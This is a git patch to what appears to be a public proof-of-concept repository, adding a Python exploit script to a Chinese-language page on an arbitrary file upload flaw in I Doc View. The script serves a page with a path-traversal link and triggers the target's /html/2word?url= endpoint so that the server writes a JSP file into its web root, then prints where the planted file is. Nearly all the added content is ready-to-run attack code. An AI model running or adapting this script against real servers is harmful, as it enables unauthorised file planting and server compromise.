From 11cad5b5d80e8bc5ea53f0689615e0b35d22f50b Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 26 May 2024 20:03:37 +0800
Subject: [PATCH] =?UTF-8?q?Update=20I=20Doc=20View=E4=BB=BB=E6=84=8F?=
 =?UTF-8?q?=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 I Doc View任意文件上传漏洞.md | 68 +++++++++++++++++++++++++++++++++++
 1 file changed, 68 insertions(+)

diff --git a/I Doc View任意文件上传漏洞.md b/I Doc View任意文件上传漏洞.md
index 1660184..ddf8ff0 100644
--- a/I Doc View任意文件上传漏洞.md	
+++ b/I Doc View任意文件上传漏洞.md	
@@ -23,6 +23,74 @@ poc.html
 
 ![image](https://github.com/wy876/POC/assets/139549762/73ab1c2a-ad91-40a3-96b0-0ca978fa9abe)
 
+## 利用脚本
+```python
+import http.server
+import socketserver
+import sys
+import threading
+import requests
+
+visited_pages = {'/': False, '/..\..\..\docview\poc.jsp': False}
+
+class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
+    def do_GET(self):
+        global visited_pages
+        if self.path in visited_pages:
+            visited_pages[self.path] = True
+
+            if all(visited_pages.values()):
+                print("Success! Go to http://{}:{}/poc.jsp".format(remote_ip,remote_port))
+                threading.Thread(target=server.shutdown).start()
+
+        if self.path == '/':
+            self.send_response(200)
+            self.send_header("Content-type", "text/html")
+            self.end_headers()
+            html = f'''<html>
+<head><title>Index Page</title></head>
+<body>
+    <link href="http://{ip_address}:{port}/..\..\..\docview\poc.jsp">
+</body>
+</html>'''
+            self.wfile.write(html.encode('utf-8'))
+        elif self.path == '/..\..\..\docview\poc.jsp':
+            self.send_response(200)
+            self.send_header("Content-type", "text/html")
+            self.end_headers()
+            self.wfile.write(b"<html><body><h1>Poc Works!</h1></body></html>")
+        else:
+            self.send_error(404, "File not found")
+
+    def log_message(self, format, *args):
+        return
+
+def send_request_to_remote():
+    remote_url = f'http://{remote_ip}:{remote_port}/html/2word?url={ip_address}:{port}'
+    try:
+        response = requests.get(remote_url)
+    except Exception as e:
+        pass
+
+if len(sys.argv) < 5:
+    print("Usage: python script.py <IP_ADDRESS> <PORT> <REMOTE_IP> <REMOTE_PORT>")
+    sys.exit(1)
+
+ip_address = sys.argv[1]
+port = int(sys.argv[2])
+remote_ip = sys.argv[3]
+remote_port = sys.argv[4]
+
+def start_server():
+    global server
+    server = socketserver.TCPServer((ip_address, port), MyHttpRequestHandler)
+    server.serve_forever()
+
+server_thread = threading.Thread(target=start_server)
+server_thread.start()
+
+send_request_to_remote()
+```
 ## 漏洞分析
 ```
 https://mp.weixin.qq.com/s/lDqhDnZGXoRyp2IolQ2odg